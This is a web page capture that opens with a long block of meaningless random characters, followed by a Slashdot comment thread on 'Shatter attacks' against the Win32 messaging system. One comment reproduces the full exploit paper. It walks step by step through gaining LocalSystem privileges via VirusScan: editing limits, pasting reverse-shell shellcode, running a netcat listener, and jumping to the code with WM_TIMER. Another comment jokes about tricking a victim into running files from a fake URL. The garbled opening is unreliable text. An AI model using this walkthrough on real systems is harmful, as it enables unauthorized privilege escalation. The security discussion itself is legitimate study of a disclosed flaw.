dDSaDAs.aafaSFASfSdsF fFFF.F.AA df sFDfFFSa SSfs Afd.SaDDdFSDfaaFDsD A dF.a dF.Ddaf adSas AfSfdDaD FsFSd.dSfdDa aAFaaDasfD .aDFfS f.fs fd.AassaFsdFF .ssSdfAsSfA. adF AsfdfSfAADDfAsA. fsDF SfaDDaaSDD.dd .D. FDdsdsAA A.aF.FFsa FDAs..dDaSsFfA.FS Afafdsff.sS.DAFdFFfaDfFaffSds F.D.d.dD s.sdSFdsFd a.aFdAfaFA FSd.afsDa SfFfssSsfdsA sDa DasfF.AF.s.DfSAS aDASa..fSfSffddf A ff ASA .s.ASa sF d..FfAfFDA ffaDF .FAsDdD.SaFdf.ssdFAfAd..D.FAAds dSD.FSsSDsaaaffAsaa.A.FdaFaAassdFsfFDSD DDSasdA dAf.SfdFsdAfAFDf.s DDsfDaaDfd aSsfSDDaAa d .asAa s. ds daaS aAAAf dfsADf.FfafADS saDdAsdDaFDAfdF.DfaddAfaFASSddaffDDassDs.SS aSf..AfsaSss .DSdDdDD..FsS.a DD fa dFDfFSSsaSFSaFFDAaFfsS fasaS faFsassF.fFAsSD.DSSD saaAfaF . .sdasAf.AS.daSdsfFFdfsdADAFDsD aFSdd Sfs fA .DS SSSs.FSFfSSDfaD FdSdF.Adds.fFDDSAAD fSf.d.SFsAd..a D..d as.sa.DA D.aAd..fDD sS saffsAD FSAFA fdsAdSDsFfaADS.AaaASfDfdsd.FdSdFF faddfdAAFA DaS.SdAASDFaSSdAaaASfFsSffsssFAa.sdD Dda dafa aaAADafFS.saaAFAD.S.SdFF fdSFdsFfSAaFsFAasDaSDDSDAAfFS d.S...d.da FA ADAdD dSa.dD afF DAfFDddD.SS ds DSffFaf.dff S FssSS.fsffa.sSf aaa Sa s.F Ads.d dFaf fSDfDFaadddASFAddDaSd .fDADDFassFaAAaDDf..aSaDFdSsaaAaf DadAdADaS DSs sa fFSs.F.aFaAaAaFSdAa.dsDFaS.ADdsfdDSsDAsAADFsDF.sf. dFdaSASFaAdsF a SDdDdDSdaAasFSfs AsdaDdd Af.A.Dds DsfsfFdADaFF AsFFasa DS.Sf.AFdaAAAS.fa dadaSDfDAfFFFAS. .F.Dfs FSf.dff SDD Das .d DFffa .DS D DDSddfaaaADaSsSFSaDSSaFa F.d FDfAADaFFdaf.fsd..aaS.SFDFfADDsAS fddAdaDAAFFSdDFf.SdDAsAaD Dad ADFDdd.sDS.AdfAdS .a d. sSfsaDFDDDsaF D fA.SasASdDaSsdd FSFaAS.fSaA Sd...FDss F dFdAdAadfFdaSsAdfaD.ASa SaS. SfFSF .fSsF SFaD Af ddsaASFA DsafaSfSASd.SFASa dAD..dasDS. a.Ad D.DA A.ffDa.aAdAdfDSfFfda. .DDA Sddd.sFdsFssAAFFFA dSaSSsaDFDdAA DFfaSAsSFdd sd FFF a ddA.d sDaDSFdDS.a FfS SaFS.DfsfAfFASfSAf fFs.FsASS a afA.SDffdfFaSDSsfa sfA.SfAADDssa .sdF Saa sSf.aSsSFS . DD. SfDS.FFdS FD afasAS sSdDSSSAFdssaadaa D SssSSs.s.f SAd fF.ssd fdDfdfdDFFas SdA.sFf.ADA.SSd..D sSDS.dADaAFDfdddSfDDFAf.fs dasS .AaFDAFFdFDAs... SSAs. sFSfs .ad.ssS.sFDFAaF .dsSDdD .a DSFdAaSAsDfd. aD.dDSddDF.sDAaFda ad.aaS DdSSSF DssfAfaAA ddSd SF aaDaSsFa.SSFa s DF.afSSA.dafsFasF. Da Dsa ssa D.dS.AAAf af.sfsddaFsddFSf DSSdfS sAdSfDdfa ADF.FDads.F AFadaAFSDAaAFDaf.SDAfF fDASFSSff AASsAAasADsfDA Ad..dSd.faF.DfdfFaa.AD.SdDFDSA dDffdsAs FsfD Fdfa AsS Sf fs..AFfFa S s A fa AA a.dsASDadf sd.sDFd SFAdfsAAFda daSSD AFSad.Afs fAF.fAsF.F .f fASaf Ss fsF FfAfDdfFDsdSaaa.fS sA S.sDASsAa.FFdAdS aDSF.Faa S Dfsfd s.dd dsfdSFA DfdAdsA DfF DsDsAas. DdFaS sfaDafaADfdsaFsSDAAadSfdasSafdS SS S. S.F..FfAAFaFdFs sdasFfF s FDSdf f Sdds.asdFfd.Ff FD fDF fD ss.SAf .SAsSSfS.DDDfsFaAs.SFdf SSfdsDSffs sD..FSSS.aSsD.dfDDFsfAADF fs.SAaASsffDs .DFDDdd .sFdFA.S. FFdAaDdssDa fadf..SsAA Aadas..F.DaS.FaasDsAff.SdadfFaFfddSfsDsdA .Sd.DA.addfdaA AadDaF.f SsF.FdaASs sa A .DA dSS.D Fda add.dSsDdfsAADsaSaDd ..saFDFdF ddD fA SaDfSA FfAASsSD SDdS.das .DafA sAdSf.ssdFFF.SD FdfafDS SSDssa.ADd aSSaSD.ASA.sAdSADAfsdasfff Fd.d Aa f.SFSsaDD A ssF fFAFfsfsf AF.Dd DaAAdD ss.A dAFAASSFDs.dASdS DdfDDF. ddAfFsSAafsS..Ads.DDdAf.FSSA FdFa. asaSsfD.AFSD.ADDDdaFaDDFfAa D.FadaFAAASaAdaAaDdDs F fAd.a f.Af.FfDfF asadsA a. ffdD.DsF.AsasSa... . aS.fffAdD.DsFSFa .ADaFfaDdsd AF fDaSfAadSF AS As da s SaFD dAf.FdsDDFDaAD a FDD .DFdfSfdSDSsaDsAaFd.Fd AFS.DfSs SdD.FafSDdDassAdsDs.aDAafSDSAsasA.aA.Sd.Fs..d sSf AAsdS sAdSSADf ..SDsAAd DDaFfAAasSA.fS AdfdsS.dDAaFaDfS aFAAfaASFdDsF .dDsAAaFfAasD.Sf Ffsf.fsDsfAfd.dSFfdfSdFs dsfF .Dada.AfFDDAas D DsFAASD.aFA. SS.FD Ssssf FDfdDAddas.ds.DaSfFdd.aDfSaS. dDsAaFd sAAdDD .a.Fd .ds afaaDd.s.s.dSdDsA asaassafA.FFfadAd.. dFAdasSDAffA ADAD.sdFssfsfaS .aDaAsa.DaSfAfDssfFaSasDfSaF.SfaFdaSffAdAsAa AfDafaSSfA..AFF fs Asaa A sFadADDdDsdfDAFSDASDs.FSSdSSF sadf .asd.dSd. dFfD d. fDaAf.f.df DDf.sDFf aA

Fundamental flaws??? (-1)

Anonymous Coward | more than 11 years ago | (#4020517)

What is that bullshit? Fundamental flaws of the Windows API??

*Every* API has flaws.

And Microsoft knows that. This is why they are pushing the new .NET API, which fixes a lot of these flaws.

Jeez (0, Troll)

roguerez (319598) | more than 11 years ago | (#4020521)

That's really OLD. Like >15 years or so. It's not comparable at all to X-Windows where the clients run on a multi-user system.

Isn't this in the EULA anyway? (5, Funny)

Dynamoo (527749) | more than 11 years ago | (#4020529)

"Essentially, they allow you to take control of any window on your desktop".. sounds like it's straight out of Microsoft's new EULAs.

Take control? (0, Flamebait)

Corvaith (538529) | more than 11 years ago | (#4020536)

Does that mean that you could make them all stop crashing? Please?

I'm on reboot #26 today. And this with the supposedly stable Windows XP. Trustworthy computing--I can't even trust it to /run/. I have no illusions about it being secure.

Re:Take control? (4, Insightful)

Moridineas (213502) | more than 11 years ago | (#4020565)

Why on earth is it crashing? Check your event logs. That should NOT be happening--sounds for sure like a hardware failure.

Here's the output from the "systeminfo" command on my work computer fyi:

Original Install Date: 3/15/2002, 11:24:37 AM
System Up Time: 60 Days, 6 Hours, 36 Minutes, 21 Seconds

Re:Take control? (1)

Stonehand (71085) | more than 11 years ago | (#4020636)

How the hell is the parent post "Redundant"? Is a moderator simply so narrow-minded as to want to slap-down any post which posits an explanation why a system might seem incredibly unstable instead of assuming that it's always Microsoft?

And yes, if it's crashing 26 times in a day, the obvious suspects are (a) bad hardware, (b) severe misconfiguration caused by manually editing the registry, mangling system files, et al, (c) worms, trojans and viruses, (d) a VERY badly written OS (and WinXP != DOS or Win9X...).

Re:Take control? (0)

Anonymous Coward | more than 11 years ago | (#4020626)

You must be so full of shit that its oozing out of your ears. I have been running XP since early beta days and Ive only had to reboot due to a crash 1 time and the core OS didnt actually crash it was a DirectX game crash and the desktop wouldnt recover. I attribute this to a combination of a bug in the game and a bug in the display drivers because I have had the game crash since then but with newer drivers and it recovers fine.

Re:Take control? (1, Insightful)

Anonymous Coward | more than 11 years ago | (#4020711)

Wow! If it works for your system then anyone else who it doesn't work for must be a liar!

Jerk. (it crashes for me too)

Re:Take control? (1, Troll)

Tassleman (66753) | more than 11 years ago | (#4020631)

You're either full of shit or have some bad hardware in your box. Alternatively, you could just be incompetent or want to join in on the MS bashing with all the others. Either way, BS.

You must be incompetent. (0)

Anonymous Coward | more than 11 years ago | (#4020685)

I'm sorry, nothing personal here. But 26 reboots? I know serious Linux users here can't take you too seriously but I also know there are some young impressionable minds here.
Here is some advice kids: When you come across any computer "expert" who has a computer they have to reboot 26 times in a day. Run!!!
And here is a real-life experience from someone (me) who makes his living developing on Windows:
I've used Win2k Pro since the day I bought it over 2 years ago. I've rebooted because of a crash or a freeze maybe 10 or 12 times in that time frame. I've had to reinstall the system once. I can say with some confidence that 99% of my reboots are caused by badly designed third party drivers.

Re:Take control? (0)

Anonymous Coward | more than 11 years ago | (#4020700)

I wondered where all my bad luck went today... I've only had to rebood 4 times.

Ummm... 'Kay (4, Insightful)

handorf (29768) | more than 11 years ago | (#4020538)

So basically you're saying that if you can get a user to run arbitrary code and that user has access to applications with higher access rights, you can get those access rights.

If you can get the user to run arbitrary code, they're already dead.

Not to say that windows is secure, but this seems to be picking nits to me.

Re:Ummm... 'Kay (5, Informative)

ptomblin (1378) | more than 11 years ago | (#4020583)

You misunderstand. He's talking about NT/2000/XP, where you have privilege and non-privilege accounts, and where even as a non-privilege account, you can have stuff running as the Windows equivalent of "root", and you can use any window that "setuid root" application pops up to root the box yourself.

The example he gave is the anti-virus program that runs with administrator privs (because it has to do stuff to the registry), when you're logged in as Joe User without admin privs. The anti-virus program pops up a window, and bam, you've hijacked the window, given yourself admin privs, made a new administrator login for yourself, and you're away to the races.

Re:Ummm... 'Kay (3, Insightful)

handorf (29768) | more than 11 years ago | (#4020662)

Right... a non-priveleged user has access to a window running a more-priveleged account.

But the window must be in the user's workspace. You can impersonate the user, or, if the software in question has bugs in it (buffer overruns, etc), you can exploit those.

If the user doesn't have any access to these programs (which they probably shouldn't in a truly secure environment) it isn't an issue. Turn off the user component.

Look at it this way... if you have a X window to a SUID program running and you run arbitrary code... you could well be screwed. This isn't any different.

Still, I'm back to my "If the user runs unknown code, they're screwed". There will always be SOME bugs in ANY operating system which can be exploited if you can get a user to run arbitrary code. Which is why encouraging good user habits are so important.

Re:Ummm... 'Kay (2, Informative)

Anonymous Coward | more than 11 years ago | (#4020724)

"If the user doesn't have any access to these programs (which they probably shouldn't in a truly secure environment) it isn't an issue. Turn off the user component."

You don't understand. The example antivirus program would be running, even if the user component was off. if its running, it can receive messages. if it can recive messages, it can be 'rooted' by the user.

Re:Ummm... 'Kay (1)

silicon_synapse (145470) | more than 11 years ago | (#4020730)

User habits have nothing to do with this. What if its that user who wants the priviledge escalation? If you had read the paper, you'd know this exploit isn't run by simply clicking a button or two. Anyone who does this will know exactly what they're trying to do. No ammount of "encouraging good user habits" will stop this unless it involves a cat of nine tails.

Re:Ummm... 'Kay (3, Insightful)

MisterBlister (539957) | more than 11 years ago | (#4020717)

Yeah but in any case, software companies could work around this without breaking the Win32 API just by seperating out the parts of the code that need special privledges from the user interface code and use a secure message passing system (not based on standard windows message passing) between the two.

Of course, the fact that apps aren't doing this goes to show that at the very least Microsoft has some education to do when it comes to developing secure 3rd party apps, but its not nearly as earth-shatteringly broken with no hope of being fixed as the paper author lets on.

EASY! (4, Funny)

mekkab (133181) | more than 11 years ago | (#4020586)

(RING!)

ME) Hello, Mr. Hockenblock?
MR HB) yes?
ME) Our network associates have found a bug in the network system.

MR HB) Oh, really?
ME) Yes, it seems there is a particularly nasty roving virus that when it hits your system through an open port, can cause your computer to get stuck in an n-th complexity infinite binary loop*

*- note blatantly stolen bogus virus description! (see: good times virus warning)

MR HB) Dear lord, no!
ME) any ways, there is a way to fix it.
MR HB) How?!
ME) just got to http://www.eye.0wn.j00.com and download and run the files there.
MR HB) thanks!
ME) please tell all your friends.
MR HB) I will!

Re:Ummm... 'Kay (1)

okigan (534681) | more than 11 years ago | (#4020596)

This is totaly true, wonder why others do not see it.

The system should take care of not allowing the executable to "executed".
After that it should be able control windows as it needs.

The ability to control windows on desktop allowed for many nifty features (ex. most
plug ins into MS Dev that need to control a window are done this way)

you're totally missing the point (2, Informative)

jbellis (142590) | more than 11 years ago | (#4020598)

he's not describing a remote attack; in unixspeak, he's describing how a non-root local user can gain root access.

Re:Ummm... 'Kay (1)

billatq (544019) | more than 11 years ago | (#4020623)

I have to disagree-- You're looking at the difference of escalating security rights and actually getting access to the machine. Often there are guest accounts on machines, and if a user can get any of this code to run...they're pretty much gained complete control of it. Of course, this is a problem with the win32 api itself. Microsoft is going to have fun with this one...

Security from the ground up. (3, Insightful)

scorpioX (96322) | more than 11 years ago | (#4020547)

This just goes to show that security has to be DESIGNED into the very core of any code and not as an after thought (10 years later in the case of the Win32 API). Taking a month off from new features to implement "Trustworthy Computing" isn't going to fix anything.

Re:Security from the ground up. (3, Interesting)

bokmann (323771) | more than 11 years ago | (#4020694)

The scary thing is the way they will fix it...

"In order to avoid this problem, we are restricting running code to ONLY applications that are signed by Microsoft, or signed by a Microsoft-granted key."

How many open-source projects will run out and get one of these keys?

Overclocked House Needs Extreme Cooling (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#4020554)

Owensboro, KY - An enterprising young man has managed to run his appliances faster by overclocking the electrical system in his house. Toast gets done faster, beverages get colder and clothes spin dry at the speed of light, well, almost.

Lance Hatler, was irritated with the measly 60 Hz that the electric company fed into his house and decided he could do better. I thought my overclocked computer system is pretty sweet. Why can't I apply the same principle to my house? I mean besides the fire code, questioned Hatler.

After several trips to the emergency room for massive electric shocks, Hatler's house now runs at a blazing fast 900 MHz. Attempts to run the house even faster caused a bit of structural instability and a few minor fires. My heart stopped one time, but the thought of shredding two by fours in my garbage disposal got the blood pumping again, Hatler recounted.

Hatler believes that keeping America on a 60 Hz standard is part of a conspiracy by electricity producers. The electric company is trying to keep us in the dark ages, said Hatler. Theyve been stuck at 60 Hz since I was born. Moores law has to take effect some time doesnt it? I heard about one guy who made a generator that pumps out electricity at 2 GHz, but the major electric conglomerates bought him out to keep us going slow.

At 900 MHz, the large amount of excess heat generated by this procedure required Hatler to build a giant heat sink and fan combination which he mounted to his roof. It required some structural reinforcement to bear the load, but now Hatlers home remains a constant, cool 115 degrees summer and winter.

Neighbors have complained about the hurricane-like sounds emanating from his property and the local airport has had to reroute traffic around the airspace above Hatler's home as tremendous wind currents and strange thermal patterns have wreaked havoc on navigation, but other than that the procedure has been trouble-free.

Next on the agenda for Hatler is adding water cooling so he can safely break the 1 GHz barrier. There's always a network of pipes around the house. I just have to add more tubes, said Hatler. I just wish I could find a place that would sell thermal compound in 55 gallon drums.

Friends dont understand Hatlers obsession with overclocking, but do enjoy some of the benefits. Microwave popcorn takes like 5 seconds and Ive gotten used to the beersicles, said long time friend Greg Denson. He has an electric water heater so you want to be careful taking a shower so you dont scald your skin off.

At the time of this report Hatler was under investigation by the FAA, Twin Hills Homeowners Association, and the Association to Stop Giant Fan Generated Tornadoes.

Article text in case of /. effect (-1, Redundant)

SoCalChris (573049) | more than 11 years ago | (#4020555)

Exploiting design flaws in the Win32 API for privilege escalation. Or... Shatter Attacks - How to break Windows. By Foon - ivegotta@tombom.co.uk Introduction This paper presents a new generation of attacks against Microsoft Windows, and possibly other message-based windowing systems. The flaws presented in this paper are, at the time of writing, unfixable. The only reliable solution to these attacks requires functionality that is not present in Windows, as well as efforts on the part of every single Windows software vendor. Microsoft has known about these flaws for some time; when I alerted them to this attack, their response was that they do not class it as a flaw - the email can be found here. This research was sparked by comments made by Microsoft VP Jim Allchin who stated, under oath, that there were flaws in Windows so great that they would threaten national security if the Windows source code were to be disclosed. He mentioned Message Queueing, and immediately regretted it. However, given the quantity of research currently taking place around the world after Mr Allchin's comments, it is about time the white hat community saw what is actually possible. This paper is a step-by-step walkthrough of how to exploit one example of this class of flaw. Several other attack methods are discussed, although examples are not given. There are many ways to exploit these flaws, and many variations on each of the stages presented. This is just one example. Background - the Win32 messaging system Applications within Windows are entirely controlled through the use of messages. When a key is pressed, a message is sent to the current active window which states that a key was pressed. When Windows decides that an application needs to redraw its client area, it send a message to the application. In fact, when any event takes place that an application needs to know about, it is sent a message. These messages are placed into a queue, and are processed in order by the application. This is a very reliable mechanism for controlling applications. However, on Win32 the mechanism for controlling these messages is flawed. Any application on a given desktop can send a message to any window on the same desktop, regardless of whether or not that window is owned by the sending application, and regardless of whether the target application wants to receive those messages. There is no mechanism for authenticating the source of a message; a message sent from a malicious application is indistinguishable from a message sent by the Windows kernel. It is this lack of authentication that we will be exploiting, taking into consideration that these messages can be used to manipulate windows and the processes that own them. Overview In this example, I will be exploiting Network Associates VirusScan v4.5.1, running on Windows 2000 Professional. Since the VirusScan Console runs on my desktop as LocalSystem and I am logged on as a guest user, the objective is to trick VirusScan into running my code to elevate my privileges. This is accomplished in several easy stages. 1. Locate a suitable window within VirusScan (an edit box is perfect), and obtain a window handle to it. 2. Remove any length restrictions that may be present on that edit box, so that I can type in an arbitrary quantity of data. 3. Paste in some binary executable code. 4. Force VirusScan to execute my code (as LocalSystem) This is actually very easy to do. Windows conveniently provides all of the functionality that we will be needing. I have written a small application called Shatter which implements this functionality. You'll also need a hex editor that is capable of copying binary data to the clipboard (I use UltraEdit), and a debugger (I use WinDbg). Windows messages consist of three parts, a message identifier and two parameters. The parameters are used differently depending on what message is sent. This makes our life simpler, since we only have to worry about four things; a window handle to receive the message, the message, and two parameters. Let's find out how easy this is... Stage 1: Locating a window We need to locate an edit control of some kind - something that we can type stuff into. Don't worry if it's restricted, we can cure that. Fire up the VirusScan console, and hit the first button - "New Task". Conveniently, at the top of the dialog, there's an edit box. That will do perfectly. Now, we need a handle to that control so that we can interact with it. Windows is more than happy to give us a handle to any window we like - we just have to ask it. Fire up Shatter, and position it so that you can still see the VirusScan edit control underneath it. Click on "Get cursor window" - Shatter should add an item in the list box beneath like "102f2 - Get cursor window". This is because we've asked Windows to give us a handle to the window directly underneath the cursor. Move the cursor over the VirusScan edit control and hit Space to trigger Shatter again. Shatter should clear the list box, and tell you the handle for the target window - in my case it's 30270. So, we can now interact programmatically with a window that is running with higher privileges than we are. Let's paste in some shellcode. Stage 2: Removing Restrictions Now that we have a window handle, we can send any messages we like to that control and it will blindly execute them. First things first - let's make sure we have enough space for our shellcode. Within Shatter, type your window handle into the "Handle" box. The message to set the maximum text length of an edit box is EM_SETLIMITTEXT. The first parameter is the new maximum text length, and the second parameter is ignored. Type 4 into the WPARAM box, and 0 into the third. Click on EM_SETLIMITTEXT to send the message, and try to type something into the VirusScan edit box. You shouldn't be able to type more than 4 characters. Change the 4 to FFFFFFFF and send the message again. Now try typing into the VirusScan edit box; you now have over 4Gb (theoretically) of space within that edit control. Should be enough for even the most wasteful shellcode. Stage 3: Injecting Shellcode Next up, let's try pasting something into the box. Yes, OK, you could just right-click and choose Paste, but for the sake of argument let's work as if we couldn't do that. Clear the VirusScan edit box, and fire up Notepad. Type some text into Notepad, and copy it. Back in Shatter, we want to send VirusScan a "Paste clipboard contents" message, which is WM_PASTE. Both parameters for this message should be zero, so set the WPARAM and LPARAM to zero, leaving the handle the same. Click WM_PASTE, and watch your text appear in the VirusScan edit box. Click it again, and it should now be there twice. Fun, huh? OK, that's enough playing. Clear the VirusScan edit box again, and fire up your hex editor. Load up sploit.bin, included in the Shatter zipfile. This is the shellcode taken from Jill (Hey, Dark Spyrit!) which fires a remote command shell back to you. It's hard-coded to send a command shell to the loopback adress on port 123, so now's probably a good time to fire up a Netcat listener before you forget. Fire up a cmd, hit "nc -lp 123" and forget it. Back to our hex edit. Copy the shellcode to the clipboard, making sure you get all of it (including the FOON at the beginning - we'll need that in a sec). Back to Shatter, and hit the WM_PASTE button again. You should now see a whole load of nasty-looking characters in the VirusScan edit box; that's our shellcode, nicely pasted in. Stage 4: Executing the code This is the only part of the process that requires any skill. Fire up your debugger, and attach it to the avconsol.exe process (Using WinDbg, that's F6 to attach, and just choose the process). Next, do a search through memory for the FOON string. The WinDbg command is s -a 00000001 10000000 "FOON" but you might use a different debugger. Note down the memory location that the string appears at; it'll probably appear a couple of times, don't ask me why. Any of them will do. On my system, the shellcode appears at 0x00148c28, it shouldn't be far off if you're using the same version. Now, kill the debugger, log on as a guest user, and prepare to receive localsystem privs. Follow stages 1 through 3 again, noting that everything still works as a guest user. Don't forget the Netcat listener to receive the shell. At this point, you might be thinking that attaching a debugger is a privileged operation. It is. However, much the same as when writing a buffer overflow exploit, you can do that part on any system; all you need is the load address which should then work on any system running the same version of the software. In actual fact, you needn't actually do this at all. Most applications have their own exception handlers (VirusScan certainly does), so if they generate an access violation, they just deal with it and move on rather than crashing. So, there's nothing to stop you pasting in a few hundred kilobytes of NOPs and then just iterating through memory until you finally hit the right address and your shellode executes. Not particularly elegant, but it'll work. The final message that we're going to make use of is WM_TIMER. This is a slightly odd and very dangerous message, since it can contain (as the second parameter) the address of a timer callback function. If this second parameter is non-zero, execution will jump to the location it specifies. Yes, you read that right; you can send any window a WM_TIMER message with a non-zero second parameter (the first is a timer ID) and execution jumps to that address. As far as I know, the message doesn't even go into the message queue, so the application doesn't even have the chance to ignore it. Silly, silly, silly... So, within Shatter, the handle should be set to the VirusScan edit control containing our shellcode. The first parameter can be anything you like, and the second parameter should be 512 bytes or so above the address we picked out of the debugger earlier (we have 1K of NOP's in front of the shellcode, so we should land slap bang in the middle of them); on my system that's 0x148c28 + 0x200 = 0x148e28. Hit WM_TIMER, and your netcat listener should come alive with a command prompt. A quick WHOAMI will reveal that you have indeed gone from guest to local system. Enjoy. Alternative techniques There's a few other ways of doing what we just managed, utilising the same basic mechanisms but maybe adding a bit more complexity. The EM_GETLINE message tells an edit control to copy its contents to a location specified within the message. How would you like to write arbitrary quantities of data to arbitrary locations in memory? How easy a sploit do you want? We've seen how the restrictions can be removed from the length of an edit control; what happens when an application depends on these restrictions? When an application expects 16 bytes of data from a limited-to-16-byte edit box, we can type in a few gigs. Everyone, on three; 1....2....3....Buffer Overflow! Probably stack-based too, since 16 bytes of data is unlikely to come from the heap. Also, when we send WM_TIMER, the parameter we specify as a timer ID gets pushed onto the stack along with a whole load of other crap. It's not inconceivable that we could find a function which makes use of the 3rd function parameter and none of the others, allowing us to jump directly to a sploit with a single message. Talking of the heap, that's another great thing about these exploits. Generally, applications will create dialog boxes on the heap well in advance of any major memory operations taking place; our shellcode address is going to remain pretty static. In my experience it rarely moves more than 20 bytes between instances. Static jump addresses shouldn't be a problem, but who cares? Send the app an EM_GETLINE message so it writes your shellcode to a location you specify (Hell, overwrite the heap. Who's gonna care?) and then specify the same address in your WM_TIMER message. A completely NOP-free sploit! What fun! Fixing the problem Okay, so this is pretty easy to exploit. How is everyone gonna fix this? I can see two quick and dirty methods which will break a whole lotta functionality, and one very long-winded solution which is never going to be a total solution. Let me explain. 1. Don't allow people to enumerate windows Nasty. Multiple breakages. Theoretically possible, but I'd hate to see people trying to work around not knowing what windows are on the desktop when they need to. 2. Don't allow messages to pass between applications with different privileges Means that you couldn't interact with any window on your desktop that's not running as you; means that VirusScan at the very least (probably most personal firewalls, too) would need a whole lotta redesigning. 3. Add source info to messages, and depend on applications to decide whether or not to process the messages Would need an extension to the Win32 API, and a whole lotta work for people to use it. Big job, and people would still get it wrong. Look at buffer overflows - they've been around for years, and they're still fairly common. Basically, there is no simple solution, which is why Microsoft have been keeping this under their hat. Problem is, if I can find this, I can guarantee that other people have as well. They might not tell anyone about it, and the next time they get into your system as a low-priv user, you wouldn't have a clue how they got LocalSystem out of it. After all, you're all up to date on patches, aren't you? Addemdum: Why is this a problem? When Microsoft saw a copy of this paper, they sent me a response stating clearly that they are aware of these attacks, and they do not class them as vulnerabilities. I believe that this point of view is incorrect. The two reasons that Microsoft stated are that a) They require unrestricted physical access to your computer, or b) they require you to run some kind of malicious code on your machine. I agree completely that in both of these scenarios, 0wning the machine is pretty easy. However, they've missed the point. These are techniques that an attacker can use to escalate their privileges. If they can get guest-level access to a machine, these attacks allow you to get localsystem privileges from any user account. Anyone ever heard of a little tool called hk.exe? How about ERunAsX (AKA DebPloit)? How about iishack.dll? All of these tools exploit some flaw that allows you to escalate your privileges AFTER you've gained access to the machine. All of these have been recognised as security holes by Microsoft, and patched. If you have a corporate desktop machine, most commonly those machines will be quite tightly locked down. The user on that machine cannot do very much that they have not been explicitly granted permission to do. If that machine is vulnerable to a shatter attack, that user can gain localsystem privileges and do what they like. Even worse is the case of Terminal Services (or Citrix). Imagine a company providing terminal service functionality to their clients, for whatever purpose. That company is NOT going to give their users any real privileges. Shatter attacks will allow those users to completely take over that server; localsystem privileges are higher than the Administrator, and on a shared server that's a problem. Oh, and it doesn't require console access either - I've successfully executed these attacks against a Terminal Server a hundred miles away. The simple fact is that Microsoft KNOW that they cannot fix these flaws. The mechanism used is the Win32 API, which has been fairly static since Windows NT 3.5 was released in July 1993. Microsoft cannot change it. The only way they could stop these attacks is to prevent applications from running on the desktop with privileges higher than those of the user logged on. Microsoft believe that the desktop is a security boundary, and that any window on it should be classed as untrusted. This is true, but only for Windows, and because of these flaws. Either way, Microsoft break their own rules; there's numerous windows on a standard desktop that run as localsystem. Use my shatter tool to verify this - there's a whole load of unnamed windows which might be running as Localsystem, and a few invisible windows (like the DDE server) that definitely are. Security boundary my arse. Is this just a Win32 problem? Probably, yes. The only mainstream competitor to Windows in terms of windowing systems is X windows. X is based on a similar underlying technique, that of queueing messages that are passed between windows. X, however, has two major differences. Firstly, a window in X is just a window - it's a blank page on which the application can do what it likes. Unlike Win32 where each control is a window in its own right, a control in X is just a picture. When you click that control, you're actually clicking the window surrounding it, and the application is responsible for figuring out whether or not there's actually a control underneath your mouse and responding accordingly. Secondly, and more importantly, X messages are just notifications, not control messages. You can't tell an X window to do something just by sending it a message. You can't tell it to paste text. You can't tell it to change the input limits on a control. You certainly can't tell it to jump to a location in memory and start executing it. The best you can do is send it the mouse clicks or keyboard strokes that correspond to a paste command - you certainly can't tell a control to paste in the contents of the clipboard. As such, it's still theoretically possible for some of these attacks to work against X but in practice it's highly unlikely. You could flood an application with fake messages and see how it responds; you could send it corrupt messages and see how it responds. Chances are, it would cope just fine, since it'll choose what to do with the messages and process the flood one at a time. Anyway kids, have fun, play nicely, be good. And remember - if it ain't broke, hit it again.

Re:Article text in case of /. effect (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#4020602)

The article is straight text, no images, off a good connection. Please moderators, for once do your job and mod these down as redundant.

Scott Charney (1, Informative)

Oliver Newland (596957) | more than 11 years ago | (#4020558)

I went to University of Michigan with Scott Charney and he's a really cool guy. A little background info [umich.edu] is in order here. I really hope that he improves the Microsoft security record, and I really think he's enough of a go-getter to do just that.

This is not new (1, Insightful)

Anonymous Coward | more than 11 years ago | (#4020559)

This class of attack is not new, it has been discussed before. While you can assert that the blame lies with Microsoft (and I'll admit they do
have some responsibility to address the problem you describe) the chief blame lies with the vendor of the software whose bad programming you are exploiting. There is no excuse to put a window for a process with the LocalSystem security context on a user's desktop. I am not aware of any Microsoft application that makes such a mistake.

Re:This is not new (1, Informative)

Anonymous Coward | more than 11 years ago | (#4020652)

This is very true. Had they been following the guidelines for proper Win32 application development this would not be an issue. In this case, they should have decoupled the GUI control interface from the service/daemon that must run as LocalSystem and used a secure interprocess communication mechanism.

It's really no different than if I bang out an exploitable daemon that has to run as root under Linux.

unfixable? (0)

Anonymous Coward | more than 11 years ago | (#4020569)

How is it unfixable? Is it unfixable in the way that many current applications rely on this feature?

here we go (-1, Troll)

tps12 (105590) | more than 11 years ago | (#4020573)

Well, what can I say to this? We've all suspected that poor design could finally bite Micro$oft for real. And now here it is. The unpatchable security hole.

I think this is the end of Windows.

What can they do? Where can they go? Even if M$ could take all of its employees off the Office, X-Box, and every other project, and put them to work on a new OS, it would be months before it could be released, and more months before there were any applications for it. By that time, most or all of the existing Windows base will have been compromised.

It's kind of unfortunate that Linux will win, not based on its (considerable) technical merits, but because of a Windows design flaw. But in the end, all computer users will be better off, so I can't complain. Welcome to the world without Windows.

Re:here we go (1, Troll)

turbine216 (458014) | more than 11 years ago | (#4020632)

The END of WINDOWS? Christ, could you pack just a little more apocalyptic FUD into that statement?

This "exploit" is hardly even an exploit - it requires the ability to run arbitrary code. And if just anybody can acquire the ability to run arbitrary code, then i would say the problem runs a bit deeper than msgsvr32.dll.

Here's something to chew on, zealot: use this exploit on my win2k server. I dare you. What? You can't get in? Oh, you mean the BASIC SECURITY FEATURES BUILT INTO THE OPERATING SYSTEM HAVE THWARTED THIS EXPLOIT BEFORE IT COULD EVEN GET OFF THE GROUND? That's what I thought.

Christ, your drivel is actually making me sick. Do you actually believe what you just wrote?

Re:here we go (1, Offtopic)

laserjet (170008) | more than 11 years ago | (#4020681)

Does your mouth hurt? You just got trolled.

Re:here we go (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#4020720)

nah...look at his previous posts. This guy's not smart enough to be a troll. He's great at being an idiot, though.

Re:here we go (1)

joshsisk (161347) | more than 11 years ago | (#4020639)

I'll bet you $100 that this is not the "end of Windows". Seriously.

I'd be happy to lose this bet... But I doubt I will.

Re:here we go (1)

Helter (593482) | more than 11 years ago | (#4020699)

Windows 98 allowed any user with console access to operate as root for years... Now you think an obscure exploit that has been around for over 10 years is going to cause the downfall of windows?

Excuse my extreme skepticism.

Re:here we go (2)

Rick the Red (307103) | more than 11 years ago | (#4020708)

